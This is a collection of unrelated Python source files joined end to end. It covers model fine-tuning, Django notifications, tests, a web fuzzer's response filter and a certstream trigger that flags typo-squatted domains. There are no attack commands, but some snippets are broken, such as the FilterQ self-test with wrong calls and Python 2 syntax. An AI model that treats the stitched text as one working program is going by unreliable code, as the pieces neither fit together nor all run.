arch=arch, dataset=datasets.ImageNet(''), add_custom_forward=add_custom_forward)
while hasattr(model, 'model'):
model = model.model
model = fine_tunify.ft(
args.arch, model, ds.num_classes, args.additional_hidden)
model, checkpoint = model_utils.make_and_restore_model(arch=model, dataset=ds, resume_path=finetuned_model_path,
add_custom_forward=args.additional_hidden > 0 or add_custom_forward)
else:
model, checkpoint = model_utils.make_and_restore_model(
arch=arch, dataset=ds, resume_path=finetuned_model_path,
add_custom_forward=add_custom_forward)
return model, checkpoint
def get_arch(args):
add_custom_forward = True
if args.arch in pytorch_models.keys():
arch = pytorch_models[args.arch](args.pytorch_pretrained)
elif args.arch in vitmodeldict:
arch = vitmodeldict[args.arch](pretrained=args.pytorch_pretrained,
num_classes=1000,
drop_rate=0.,
drop_path_rate=0.1)
else:
arch = args.arch
add_custom_forward = False
return arch, add_custom_forward
def get_model(args, ds):
'''Given arguments and a dataset object, returns an ImageNet model (with appropriate last layer changes to
fit the target dataset) and a checkpoint. The checkpoint is set to None if not resuming training.
'''
finetuned_model_path = os.path.join(
args.out_dir, args.exp_name, args.resume_ckpt_name)
if args.resume and os.path.isfile(finetuned_model_path):
# fix hijacking of normalizer
patch_state_dict(finetuned_model_path)
model, checkpoint = resume_finetuning_from_checkpoint(
args, ds, finetuned_model_path)
else:
arch, add_custom_forward = get_arch(args)
if args.dataset in TRANSFER_DATASETS:
model, _ = model_utils.make_and_restore_model(
arch=arch,
dataset=datasets.ImageNet(''), resume_path=args.model_path, pytorch_pretrained=args.pytorch_pretrained,
add_custom_forward=add_custom_forward)
checkpoint = None
else:
model, _ = model_utils.make_and_restore_model(arch=arch, dataset=ds,
resume_path=args.model_path, pytorch_pretrained=args.pytorch_pretrained,
add_custom_forward=add_custom_forward)
checkpoint = None
if not args.no_replace_last_layer and not args.eval_only and args.dataset in TRANSFER_DATASETS:
print(f'[Replacing the last layer with {args.additional_hidden} '
f'hidden layers and 1 classification layer that fits the {args.dataset} dataset.]')
while hasattr(model, 'model'):
model = model.model
model = fine_tunify.ft(
args.arch, model, ds.num_classes, args.additional_hidden)
model, checkpoint = model_utils.make_and_restore_model(arch=model, dataset=ds,
add_custom_forward=args.additional_hidden > 0 or add_custom_forward)
else:
print('[NOT replacing the last layer]')
return model, checkpoint
def freeze_model(model, freeze_level):
'''
Freezes up to args.freeze_level layers of the model (assumes a resnet model)
'''
# Freeze layers according to args.freeze-level
update_params = None
if freeze_level != -1:
# assumes a resnet architecture
assert len([name for name, _ in list(model.named_parameters())
if f"layer{freeze_level}" in name]), "unknown freeze level (only {1,2,3,4} for ResNets)"
update_params = []
freeze = True
for name, param in model.named_parameters():
print(name, param.size())
if not freeze and f'layer{freeze_level}' not in name:
print(f"[Appending the params of {name} to the update list]")
update_params.append(param)
else:
param.requires_grad = False
if freeze and f'layer{freeze_level}' in name:
# if the freeze level is detected stop freezing onwards
freeze = False
return update_params
def patch_state_dict(path):
    pth = ch.load(path)
d = pth['model']
if ("normalizer.1.new_mean" in d or "normalizer.1.new_std" in d
or "module.normalizer.1.new_mean" in d
or "module.normalizer.1.new_std" in d
or "normalizer.normalizer.new_mean" in d
or "normalizer.normalizer.new_std" in d
or "module.normalizer.normalizer.new_mean" in d
or "module.normalizer.normalizer.new_std" in d):
print("Patching normalizer module")
new_d = {}
for k in d:
new_k = k
if k == "normalizer.1.new_mean":
new_k = "normalizer.new_mean"
if k == "normalizer.1.new_std":
new_k = "normalizer.new_std"
if k == "module.normalizer.1.new_mean":
new_k = "module.normalizer.new_mean"
if k == "module.normalizer.1.new_std":
new_k = "module.normalizer.new_std"
if k == "normalizer.normalizer.new_mean":
new_k = "normalizer.new_mean"
if k == "normalizer.normalizer.new_std":
new_k = "normalizer.new_std"
if k == "module.normalizer.normalizer.new_mean":
new_k = "module.normalizer.new_mean"
if k == "module.normalizer.normalizer.new_std":
new_k = "module.normalizer.new_std"
new_d[new_k] = d[k]
pth['model'] = new_d
        ch.save(pth, path)
return
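if __name__ == "__main__":
    # Hedged usage sketch (not part of the original module): freeze a torchvision
    # ResNet up to and including layer2 with the helper above and hand only the
    # remaining parameters to an optimizer. The architecture and learning rate
    # are illustrative assumptions.
    demo_model = models.resnet18()
    trainable_params = freeze_model(demo_model, freeze_level=2)
    optimizer = ch.optim.SGD(trainable_params, lr=1e-3, momentum=0.9)
    print(f'{len(trainable_params)} parameter tensors remain trainable')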
|
143137
|
import functools
import click
from ..arguments import commands_argument, run_file_option
def run_command(f):
@commands_argument
@run_file_option
@functools.wraps(f)
def wrapper(*args, commands, run_file, **kwargs):
if run_file:
run_options = run_file.data
else:
run_options = {}
if not commands:
try:
commands = run_options["run"]
except KeyError as ke:
raise click.UsageError(
"Missing command: Please specify your run command via arguments or in the 'run' section of the run file."
) from ke
return f(*args, command=commands, run_options=run_options, **kwargs)
return wrapper
|
143161
|
from .kitti_utils import kitti_eval, kitti_eval_coco_style
__all__ = ['kitti_eval_coco_style', 'kitti_eval']
|
143168
|
def extractLasciviousImouto(item):
"""
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'].replace('-', '.'))
if not (chp or vol) or 'preview' in item['title'].lower():
return None
if 'The Beast of the 17th District' in item['tags'] or 'the beast of the 17th district' in item['title'].lower():
return buildReleaseMessageWithType(item, 'The Beast of the 17th District', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Le Festin de Vampire' in item['tags']:
return buildReleaseMessageWithType(item, 'Le Festin de Vampire', vol, chp, frag=frag, postfix=postfix)
return False
|
143209
|
from framework.core.myexception import FuzzException
from threading import Thread
from framework.fuzzer.fuzzobjects import FuzzResult
from framework.utils.myqueue import FuzzQueue
PYPARSING = True
try:
from pyparsing import Word, Group, oneOf, Optional, Suppress, ZeroOrMore, Literal
from pyparsing import ParseException
except ImportError:
PYPARSING = False
class FilterQ(FuzzQueue):
def __init__(self, ffilter, queue_out):
FuzzQueue.__init__(self, queue_out)
Thread.__init__(self)
self.setName('filter_thread')
self.queue_out = queue_out
if PYPARSING:
element = oneOf("c l w h")
digits = "XB0123456789"
integer = Word( digits )#.setParseAction( self.__convertIntegers )
elementRef = Group(element + oneOf("= != < > >= <=") + integer)
operator = oneOf("and or")
definition = elementRef + ZeroOrMore( operator + elementRef)
nestedformula = Group(Suppress(Optional(Literal("("))) + definition + Suppress(Optional(Literal(")"))))
self.finalformula = nestedformula + ZeroOrMore( operator + nestedformula)
elementRef.setParseAction(self.__compute_element)
nestedformula.setParseAction(self.__compute_formula)
self.finalformula.setParseAction(self.__myreduce)
self.res = None
self.hideparams = ffilter
if "XXX" in self.hideparams['codes']:
self.hideparams['codes'].append("0")
self.baseline = None
def get_name(self):
return 'filter_thread'
def _cleanup(self):
pass
def process(self, prio, item):
if item.is_baseline:
self.baseline = self._set_baseline_fuzz(item)
item.is_visible = self.is_visible(item)
self.send(item)
def _set_baseline_fuzz(self, res):
if "BBB" in self.hideparams['lines']:
self.hideparams['lines'].append(str(res.lines))
if "BBB" in self.hideparams['codes']:
self.hideparams['codes'].append(str(res.code))
if "BBB" in self.hideparams['words']:
self.hideparams['words'].append(str(res.words))
if "BBB" in self.hideparams['chars']:
self.hideparams['chars'].append(str(res.chars))
return res
def __convertIntegers(self, tokens):
return int(tokens[0])
def __compute_element(self, tokens):
element, operator, value = tokens[0]
if value == 'BBB' and self.baseline == None:
raise FuzzException(FuzzException.FATAL, "FilterQ: specify a baseline value when using BBB")
if element == 'c' and value == 'XXX':
value = 0
if value == 'BBB':
if element == 'l':
value = self.baseline.lines
elif element == 'c':
value = self.baseline.code
elif element == 'w':
value = self.baseline.words
elif element == 'h':
value = self.baseline.chars
test = dict(w=self.res.words, c=self.res.code, l=self.res.lines, h=self.res.chars)
value = int(value)
if operator == "=":
return test[element] == value
elif operator == "<=":
return test[element] <= value
elif operator == ">=":
return test[element] >= value
elif operator == "<":
return test[element] < value
elif operator == ">":
return test[element] > value
elif operator == "!=":
return test[element] != value
def __myreduce(self, elements):
first = elements[0]
for i in range(1, len(elements), 2):
if elements[i] == "and":
first = (first and elements[i+1])
elif elements[i] == "or":
first = (first or elements[i+1])
return first
def __compute_formula(self, tokens):
return self.__myreduce(tokens[0])
def is_visible(self, res):
# baseline
if self.baseline and res.is_baseline == True:
return True
filter_string = self.hideparams['filter_string']
if filter_string and PYPARSING:
self.res = res
try:
return self.finalformula.parseString(filter_string)[0]
            except ParseException:
raise FuzzException(FuzzException.FATAL, "Incorrect filter expression. It should be composed of: c,l,w,h/and,or/=,<,>,!=,<=,>=")
else:
if self.baseline == None and ('BBB' in self.hideparams['codes'] \
or 'BBB' in self.hideparams['lines'] \
or 'BBB' in self.hideparams['words'] \
or 'BBB' in self.hideparams['chars']):
raise FuzzException(FuzzException.FATAL, "FilterQ: specify a baseline value when using BBB")
if self.hideparams['codes_show'] is None:
cond1 = True
else:
cond1 = not self.hideparams['codes_show']
if self.hideparams['regex_show'] is None:
cond2 = True
else:
cond2 = not self.hideparams['regex_show']
if str(res.code) in self.hideparams['codes'] \
or str(res.lines) in self.hideparams['lines'] \
or str(res.words) in self.hideparams['words'] \
or str(res.chars) in self.hideparams['chars']:
cond1 = self.hideparams['codes_show']
if self.hideparams['regex']:
if self.hideparams['regex'].search(res.history.fr_content()):
cond2 = self.hideparams['regex_show']
return (cond1 and cond2)
if __name__ == "__main__":
tests = []
tests.append("(w=200 and w=200) or w=200")
tests.append("(w=400 and w=200) and (w=200 or w=200 or w=000)")
tests.append("(w=200 and l=7) and (h=23)")
tests.append("w=201")
tests.append("w=200")
class t:
code = 200
words = 200
lines = 7
chars = 23
res = t()
f = FilterQ()
for i in tests:
print "%s := %s" % (str(i), f.is_visible(res, i))
|
143218
|
import sqlite3
from ObjetoArtista import Artista
def showArt():
try:
conexion = sqlite3.connect('musicBrainzDB.db')
cursor = conexion.cursor()
uMostrar = cursor.execute("SELECT * from Artistas").fetchall()
Art = []
for u in uMostrar:
u = Artista(id=u[0],area=u[1],TypeC=u[2],name=u[3],sort=u[4],id2=u[5],extScore=u[6])
Art.append(u)
conexion.commit()
cursor.close()
for i in Art:
print(i)
except sqlite3.Error as error:
print('Error con la conexión!', error)
finally:
if (conexion):
conexion.close()
def NArt():
try:
conexion = sqlite3.connect('musicBrainzDB.db')
cursor = conexion.cursor()
uMostrar = cursor.execute("SELECT * from Artistas").fetchall()
Art = []
for u in uMostrar:
u = Artista(id=u[0],area=u[1],TypeC=u[2],name=u[3],sort=u[4],id2=u[5],extScore=u[6])
Art.append(u._name)
conexion.commit()
cursor.close()
return len(Art)
except sqlite3.Error as error:
print('Error con la conexión!', error)
finally:
if (conexion):
conexion.close()
def main():
    showArt()
    print(NArt())
if __name__ == '__main__':
main()
|
143219
|
from django.db.models.signals import post_save
from .models import Comment
from notifications.signals import notify
from django.conf import settings
from django.apps import apps
from .tasks import email_handler
def get_recipient():
admins = [i[0] for i in settings.ADMINS]
app_model = settings.AUTH_USER_MODEL.split('.')
user_model = apps.get_model(*app_model)
recipient = user_model.objects.filter(username__in=admins)
return recipient
ADMINS = get_recipient()
SEND_NOTIFICATION_EMAIL = getattr(settings, 'SEND_NOTIFICATION_EMAIL', False)
def user2id(*args):
l = [user.id for user in args]
return l
def comment_handler(sender, instance, created, **kwargs):
if created:
recipient = ADMINS.exclude(id=instance.user.id)
if not instance.parent is None:
recipient = recipient.exclude(id=instance.parent.user.id)
if recipient.count() > 0:
notify.send(instance.user, recipient=recipient,
verb='回复了 %s' % instance.parent.user_name,
action_object=instance,
target=instance.post,
description=instance.content)
if SEND_NOTIFICATION_EMAIL:
email_handler.delay(user2id(*recipient))
if not instance.user_name == instance.parent.user_name:
notify.send(instance.user, recipient=instance.parent.user, verb='@了你',
action_object=instance,
target=instance.post,
description=instance.content)
if SEND_NOTIFICATION_EMAIL:
email_handler.delay(user2id(instance.parent.user))
else:
if recipient.count() > 0:
notify.send(instance.user, recipient=recipient, verb='发表了评论',
action_object=instance,
target=instance.post,
description=instance.content)
if SEND_NOTIFICATION_EMAIL:
email_handler.delay(user2id(*recipient))
post_save.connect(comment_handler, sender=Comment)
'''
def like_handler(sender, instance, created, **kwargs):
if created:
recipient = ADMINS.exclude(id=instance.user.id).exclude(id=instance.comment.user.id)
verb = '的评论' if instance.comment.parent is None else '的回复'
action = '赞了' if instance.status else '踩了'
if recipient.count() > 0:
notify.send(instance.user, recipient=recipient,
verb=action + instance.comment.user_name + verb,
action_object=instance.comment,
target=instance.comment.post,
description=instance.comment.content)
if (not instance.user.username == instance.comment.user_name) and instance.status:
notify.send(instance.user, recipient=instance.comment.user,
verb='赞了你' + verb,
action_object=instance.comment,
target=instance.comment.post,
description=instance.comment.content)
post_save.connect(like_handler, sender=Like)
'''
|
143226
|
import asyncio
import unittest
from types import ModuleType
from common import *
class TestArtist(unittest.TestCase):
@async_with_client(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET)
async def test_artist(self, *, client):
for artist_uri in TEST_ARTISTS:
artist = await client.get_artist(artist_uri)
await async_chain([
artist.get_albums(),
artist.get_all_albums(),
artist.total_albums(),
artist.top_tracks(),
artist.related_artists()
])
if __name__ == '__main__':
unittest.main()
|
143228
|
import unittest
import os
import numpy as np
import sys
import torch
import matplotlib.pyplot as plt
# Add .. to the PYTHONPATH
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import lilfilter.filters as F
import lilfilter.torch_filter as T
class TestTorchFilter(unittest.TestCase):
def test1(self):
filt = F.gaussian_filter(5.0)
t = T.SymmetricFirFilter(filt)
len = 500
a = torch.randn(1, len)
plt.plot(torch.arange(len), a.squeeze(0))
b = t.apply(a)
plt.plot(torch.arange(len), b.squeeze(0))
plt.show()
if __name__ == "__main__":
unittest.main()
|
143243
|
from django.core.urlresolvers import reverse
from guardian.shortcuts import assign_perm, get_objects_for_user
from core.models import ServerRole
from core.tests.base import BaseModalTestCase, BaseModalTests, BaseForbiddenModalTests
from core.tests.fixtures import ServerRoleFactory, ApplicationFactory, EnvironmentFactory, ServerFactory
class ModalServerroleForbiddenTest(BaseModalTestCase, BaseForbiddenModalTests):
url_params = {'form_name': 'serverrole'}
object_factory = ServerRoleFactory
class ModalServerroleTest(BaseModalTestCase, BaseModalTests):
url_params = {'form_name': 'serverrole'}
object_factory = ServerRoleFactory
logged_is_manager = True
def test_create(self):
response, obj = self._test_create({'name': 'ServerRoleName'})
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
def test_edit(self):
obj = self.object_factory(department=self.department)
data = {'name': 'ServerRoleName2'}
response, obj_updated = self._test_edit(obj, data)
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
self.assertEqual(obj_updated.name, 'ServerRoleName2')
class ModalApplicationForbiddenTest(BaseModalTestCase, BaseForbiddenModalTests):
url_params = {'form_name': 'application'}
object_factory = ApplicationFactory
class ModalApplicationTest(BaseModalTestCase, BaseModalTests):
url_params = {'form_name': 'application'}
object_factory = ApplicationFactory
logged_is_manager = True
@classmethod
def getSetUpObjectData(cls):
return {'department': cls.department}
def test_create(self):
response, obj = self._test_create({'name': 'ApplicationName'})
self.assertJSONEqual(response.content,
{"status": True,
"action": "redirect",
"target": reverse('application_page', kwargs={'application_id': obj.id})})
def test_edit(self):
obj = self.object_factory(department=self.department)
data = {'name': 'ApplicationName2'}
response, obj_updated = self._test_edit(obj, data)
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
self.assertEqual(obj_updated.name, 'ApplicationName2')
class ModalEnvironmentForbiddenTest(BaseModalTestCase, BaseForbiddenModalTests):
url_params = {'form_name': 'environment', 'parent_name': 'application'}
object_factory = EnvironmentFactory
@classmethod
def setUpClass(cls):
super(ModalEnvironmentForbiddenTest, cls).setUpClass()
cls.application = ApplicationFactory(department=cls.department)
cls.url_params['parent_id'] = cls.application.id
class ModalEnvironmentTest(BaseModalTestCase, BaseModalTests):
url_params = {'form_name': 'environment', 'parent_name': 'application'}
object_factory = EnvironmentFactory
logged_is_manager = True
application = None
@classmethod
def setUpClass(cls):
super(BaseModalTestCase, cls).setUpClass()
cls.application = ApplicationFactory(department=cls.department)
cls.url_params['parent_id'] = cls.application.id
cls.object = cls.object_factory(**cls.getSetUpObjectData())
@classmethod
def getSetUpObjectData(cls):
return {'application': cls.application}
def test_create(self):
response, obj = self._test_create({'name': 'EnvironmentName', 'application': self.application.id})
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
def test_edit(self):
application = ApplicationFactory(department=self.department)
obj = self.object_factory(application=application)
data = {'name': 'EnvironmentName2', 'application': self.application.id}
response, obj_updated = self._test_edit(obj, data)
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
self.assertEqual(obj_updated.name, 'EnvironmentName2')
class ModalServerForbiddenTest(BaseModalTestCase, BaseForbiddenModalTests):
url_params = {'form_name': 'server', 'parent_name': 'environment'}
object_factory = ServerFactory
@classmethod
def setUpClass(cls):
super(ModalServerForbiddenTest, cls).setUpClass()
cls.application = ApplicationFactory(department=cls.department)
cls.url_params['parent_id'] = cls.application.id
class ModalServerTest(BaseModalTestCase, BaseModalTests):
url_params = {'form_name': 'server', 'parent_name': 'environment'}
object_factory = ServerFactory
logged_is_manager = True
environment = None
@classmethod
def setUpClass(cls):
super(BaseModalTestCase, cls).setUpClass()
cls.environment = EnvironmentFactory(application=ApplicationFactory(department=cls.department))
cls.url_params['parent_id'] = cls.environment.id
cls.object = cls.object_factory(**cls.getSetUpObjectData())
@classmethod
def getSetUpObjectData(cls):
return {'environment': cls.environment}
def test_create(self):
server_role = ServerRole.objects.filter(department=self.department).first()
response, obj = self._test_create({'name': 'ServerName',
'environment': self.environment.id,
'roles': server_role.id,
'host': 'host',
'port': 22,
'user': 'user',
'method': 1,
})
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
def test_edit(self):
environment = EnvironmentFactory(application=ApplicationFactory(department=self.department))
obj = self.object_factory(environment=environment)
server_role = ServerRole.objects.filter(department=self.department).first()
data = {'name': 'ServerName2',
'environment': self.environment.id,
'roles': server_role.id,
'host': 'host',
'port': 22,
'user': 'user',
'method': 1,}
response, obj_updated = self._test_edit(obj, data)
self.assertJSONEqual(response.content, {"status": True, "action": "reload"})
self.assertEqual(obj_updated.name, 'ServerName2')
|
143263
|
class VkError(Exception):
def __init__(self, code, message, request_params):
super(VkError, self).__init__()
self.code = code
self.message = message
self.request_params = request_params
def __str__(self):
return 'VkError {}: {} (request_params: {})'.format(self.code, self.message, self.request_params)
class VkWallAccessDeniedError(VkError):
def __init__(self, code, message, request_params):
super(VkWallAccessDeniedError, self).__init__(code, message, request_params)
|
143290
|
from aurora.autodiff.autodiff import Op
from aurora.nn.pyx.fast_pooling import max_pool_forward, max_pool_backward
try:
from aurora.ndarray import gpu_op
except ImportError:
pass
class MaxPoolOp(Op):
def __call__(self, input, filter=(2, 2), strides=(2, 2)):
new_node = Op.__call__(self)
new_node.inputs = [input]
new_node.filter = filter
new_node.strides = strides
new_node.cache = {}
new_node.name = 'MaxPoolOp({})'.format(input.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
filter_height = node.filter[0]
filter_width = node.filter[1]
stride_height = node.strides[0]
stride_width = node.strides[1]
if use_numpy:
output_val[:] = max_pool_forward(input_vals[0],
filter_height=filter_height,
filter_width=filter_width,
stride_height=stride_height,
stride_width=stride_width)
else:
gpu_op.cudnn_pool_forward(input_vals[0],
filter_height, filter_width,
stride_height, stride_width,
'max',
output_val)
node.cache['forward'] = output_val
def gradient(self, node, output_grads):
        return [maxPoolBack(node.inputs[0], output_grads,
                            filter=node.filter, strides=node.strides,
                            cache=node.cache)]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
filter_height = node.filter[0]
filter_width = node.filter[1]
stride_height = node.strides[0]
stride_width = node.strides[1]
input_batch_size = input_shapes[0][0]
input_n_channels = input_shapes[0][1]
input_height = input_shapes[0][2]
input_width = input_shapes[0][3]
new_height = int((input_height - filter_height) / stride_height) + 1
new_width = int((input_width - filter_width) / stride_width) + 1
return input_batch_size, input_n_channels, new_height, new_width
class MaxPoolGradientOp(Op):
def __call__(self, node_A, node_B, filter=(2, 2), strides=(2, 2), cache=None):
new_node = Op.__call__(self)
# node_B is the output_grad
new_node.inputs = [node_A, node_B]
new_node.filter = filter
new_node.strides = strides
new_node.cache = cache
new_node.name = 'MaxPoolGradientOp(%s)' % (node_A.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 2
filter_height = node.filter[0]
filter_width = node.filter[1]
stride_height = node.strides[0]
stride_width = node.strides[1]
data = input_vals[0]
output_grad = input_vals[1]
if use_numpy:
output_val[:] = max_pool_backward(output_grad,
data,
filter_height=filter_height,
filter_width=filter_width,
stride_height=stride_height,
stride_width=stride_width
)
else:
gpu_op.cudnn_pool_backward(data, output_grad, node.cache['forward'],
filter_height, filter_width,
stride_height, stride_width,
'max',
output_val)
def gradient(self, node, output_grads):
        raise NotImplementedError('Gradient of MaxPoolGradientOp is not implemented')
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 2
return input_shapes[0]
# Global singleton operators
maxPool = MaxPoolOp()
maxPoolBack = MaxPoolGradientOp()
|
143350
|
class SystemUnsupported(Exception):
def __init__(self):
message = "不支持您的系统"
super().__init__(message)
class SubClassInvaild(Exception):
def __init__(self):
message = "SubClass didn't provide needed function"
super().__init__(message)
class InvalidInputUrl(Exception):
def __init__(self):
message = "商品链接无效, 请检查后重试"
super().__init__(message)
class InvalidInputTime(Exception):
def __init__(self):
message = "抢购时间无效, 请按照格式重新输入"
super().__init__(message)
|
143360
|
import numpy as np
from scipy.misc import imread, imsave
from glob import glob
# This function keeps the brightest pixels per x and y
# position between two images. It is similar to PIL's
# ImageChops.lighter function.
def chop_lighter(image1, image2):
s1 = np.sum(image1, axis=2)
s2 = np.sum(image2, axis=2)
index = s1 < s2
image1[index, 0] = image2[index, 0]
image1[index, 1] = image2[index, 1]
image1[index, 2] = image2[index, 2]
return image1
# Getting the list of files in the directory
files = glob('space/*.JPG')
# Opening up the first image for looping
im1 = imread(files[0]).astype(np.float32)
im2 = np.copy(im1)
# Starting loop
for i in xrange(1, len(files)):
print i
im = imread(files[i]).astype(np.float32)
    # Co-add the frames, same as before
im1 += im
# im2 image shows star trails better
im2 = chop_lighter(im2, im)
# Saving image with slight tweaking on the combination
# of the two images to show star trails with the
# co-added image.
imsave('scipy_36_ex2.jpg', im1 / im1.max() + im2 / im2.max() * 0.2)
|
143363
|
import importlib
import pathlib
__all__ = [
f.stem
for f in pathlib.Path(__file__).parent.glob("*.py")
if f.is_file() and not f.name == "__init__.py"
]
for _ in __all__:
importlib.import_module("." + _, "cooltools.api")
del pathlib
del importlib
|
143376
|
import pytest
from flex.error_messages import MESSAGES
from flex.exceptions import ValidationError
from flex.validation.response import (
validate_response,
)
from tests.factories import (
SchemaFactory,
ResponseFactory,
)
from tests.utils import assert_message_in_errors
def test_response_content_type_validation():
schema = SchemaFactory(
produces=['application/json'],
paths={
'/get': {
'get': {
'responses': {'200': {'description': 'Success'}},
}
},
},
)
response = ResponseFactory(
url='http://www.example.com/get',
content_type='application/json',
)
validate_response(
response=response,
request_method='get',
schema=schema,
)
def test_response_content_type_validation_when_no_content_type_specified():
schema = SchemaFactory(
produces=['application/json'],
paths={
'/get': {
'get': {
'responses': {'200': {'description': 'Success'}},
}
},
},
)
response = ResponseFactory(
url='http://www.example.com/get',
content_type=None,
)
# this is considered valid currently, but may change
validate_response(
response=response,
request_method='get',
schema=schema,
)
def test_response_content_type_validation_ignores_parameters():
schema = SchemaFactory(
produces=['application/json'],
paths={
'/get': {
'get': {
'responses': {'200': {'description': 'Success'}},
}
},
},
)
response = ResponseFactory(
url='http://www.example.com/get',
content_type='application/json; charset=UTF-8',
)
validate_response(
response=response,
request_method='get',
schema=schema,
)
|
143400
|
from collections import defaultdict
class FrontierSet(object):
"""
A set that also maintains a partial topological ordering
The current set of "non-blocked" items can be obtained as
.frontier
"""
def __init__(self, data=None):
self._inhibiting_set = defaultdict(set)
self._blocking_set = defaultdict(set)
self._edges = set()
self._frontier = set()
self._frozenedges = None
self._frozenfrontier = None
self._frozenall = None
if data:
for d in data:
self.add(d)
def _invalidate(self):
self._frozenedges = None
self._frozenfrontier = None
self._frozenall = None
@property
def edges(self):
if self._frozenedges is None:
self._frozenedges = frozenset(self._edges)
return self._frozenedges
@property
def frontier(self):
if self._frozenfrontier is None:
self._frozenfrontier = frozenset(self._frontier)
return self._frozenfrontier
@property
def all(self):
if self._frozenall is None:
self._frozenall = frozenset(set(self._blocking_set.keys()) | set(self._inhibiting_set.keys()) | self._frontier)
return self._frozenall
def add(self, a, b=None):
"""
Add a to the set.
If b is given, require that a is a necessary prerequisite for b
:param a:
:param b:
:return:
"""
self._invalidate()
if b:
self._edges.add((a, b))
self._inhibiting_set[b].add(a)
self._blocking_set[a].add(b)
if not self._inhibiting_set[a]:
self._frontier.add(a)
self._frontier.discard(b)
else:
self._frontier.add(a)
def remove(self, a):
self._invalidate()
for b in self._blocking_set[a]:
            self._edges.discard((a, b))
self._inhibiting_set[b].discard(a)
if not self._inhibiting_set[b]:
self._frontier.add(b)
for c in self._inhibiting_set[a]:
            self._edges.discard((c, a))
self._blocking_set[c].discard(a)
del self._blocking_set[a]
del self._inhibiting_set[a]
self._frontier.discard(a)
    def copy(self):
        new = FrontierSet()
        # copy the nested sets as well so the copy shares no mutable state with the original
        new._inhibiting_set = defaultdict(set, {k: set(v) for k, v in self._inhibiting_set.items()})
        new._blocking_set = defaultdict(set, {k: set(v) for k, v in self._blocking_set.items()})
        new._edges = self._edges.copy()
        new._frontier = self._frontier.copy()
        new._invalidate()
        return new
def issubset(self, other):
return self.all.issubset(other.all) and self.edges.issubset(other.edges)
def __len__(self):
return len(self.all)
def __eq__(self, other):
return self.edges == other.edges and self.all == other.all
def __hash__(self):
return 3 * hash(self.edges) + 7 * hash(self.all)
def __iter__(self):
return iter(self.all)
def __repr__(self):
return '{%s|%s}' % (
','.join('%x' % i for i in self.frontier), ','.join('%x' % i for i in self.all - self.frontier))
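if __name__ == '__main__':
    # Minimal usage sketch (not part of the original module): 1 must precede 2
    # and 2 must precede 3, so items can only be taken from the frontier in a
    # valid topological order.
    fs = FrontierSet()
    fs.add(1, 2)  # 1 is a necessary prerequisite of 2
    fs.add(2, 3)  # 2 is a necessary prerequisite of 3
    assert fs.frontier == frozenset({1})
    fs.remove(1)
    assert fs.frontier == frozenset({2})
    fs.remove(2)
    assert fs.frontier == frozenset({3})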
|
143429
|
from datasets.MOT.constructor.base_interface import MultipleObjectTrackingDatasetConstructor
def get_mot_class_definition():
return {
1: 'Pedestrian',
2: 'Person on vehicle',
3: 'Car',
4: 'Bicycle',
5: 'Motorbike',
6: 'Non motorized vehicle',
7: 'Static person',
8: 'Distractor',
9: 'Occluder',
10: 'Occluder on the ground',
11: 'Occluder full',
12: 'Reflection',
13: '(Unknown)'
}
def get_mot20_sequences_from_path(sequences):
valid_sequences = {}
for sequence in sequences:
words = sequence.split('-')
assert len(words) == 2
assert words[0] == 'MOT20'
if words[1] not in valid_sequences:
valid_sequences[words[1]] = sequence
return valid_sequences.values()
def construct_MOT20(constructor: MultipleObjectTrackingDatasetConstructor, seed):
from .MOT17 import construct_MOT
construct_MOT(constructor, seed, get_mot20_sequences_from_path, get_mot_class_definition())
|
143453
|
import io
import os
import pickle
import tarfile
from functools import lru_cache
from typing import Dict, Tuple
import arrayfiles
import gdown
from lineflow import download
from lineflow.core import ZipDataset
def get_cnn_dailymail() -> Dict[str, Tuple[arrayfiles.TextFile]]:
url = 'https://s3.amazonaws.com/opennmt-models/Summary/cnndm.tar.gz'
root = download.get_cache_directory(os.path.join('datasets', 'cnn_dailymail'))
def creator(path):
archive_path = gdown.cached_download(url)
target_path = os.path.join(root, 'raw')
with tarfile.open(archive_path, 'r') as archive:
print(f'Extracting to {target_path}')
archive.extractall(target_path)
dataset = {}
for split in ('train', 'dev', 'test'):
src_path = f'{split if split != "dev" else "val"}.txt.src'
tgt_path = f'{split if split != "dev" else "val"}.txt.tgt.tagged'
dataset[split] = (
arrayfiles.TextFile(os.path.join(target_path, src_path)),
arrayfiles.TextFile(os.path.join(target_path, tgt_path))
)
with io.open(path, 'wb') as f:
pickle.dump(dataset, f)
return dataset
def loader(path):
with io.open(path, 'rb') as f:
return pickle.load(f)
pkl_path = os.path.join(root, 'cnndm.pkl')
return download.cache_or_load_file(pkl_path, creator, loader)
cached_get_cnn_dailymail = lru_cache()(get_cnn_dailymail)
class CnnDailymail(ZipDataset):
def __init__(self, split: str = 'train') -> None:
if split not in {'train', 'dev', 'test'}:
raise ValueError(f"only 'train', 'dev' and 'test' are valid for 'split', but '{split}' is given.")
raw = cached_get_cnn_dailymail()
super(CnnDailymail, self).__init__(*raw[split])
|
143502
|
import komand
import time
import json
import certstream
import re
import Levenshtein
from komand_typo_squatter.util import utils
from .schema import SearchCertstreamInput, SearchCertstreamOutput
class SearchCertstream(komand.Trigger):
def __init__(self):
super(self.__class__, self).__init__(
name="search_certstream",
description="Searches certstream for new certs matching query",
input=SearchCertstreamInput(),
output=SearchCertstreamOutput(),
)
def callback(self, message, context):
"""Callback handler for certstream events."""
if message["message_type"] == "heartbeat":
return
if message["message_type"] == "certificate_update":
all_domains = message["data"]["leaf_cert"]["all_domains"]
for domain in all_domains:
score = utils.score_domain(domain.lower())
# If issued from a free CA = more suspicious
if "Let's Encrypt" in message["data"]["chain"][0]["subject"]["aggregated"]:
score += 10
if self.query:
if not re.search(self.query, domain):
continue
else:
if Levenshtein.distance(str(self.domain), str(domain)) > self.levenshtein:
continue
self.send({"domain": domain, "score": score})
def run(self, params={}):
"""Run the trigger"""
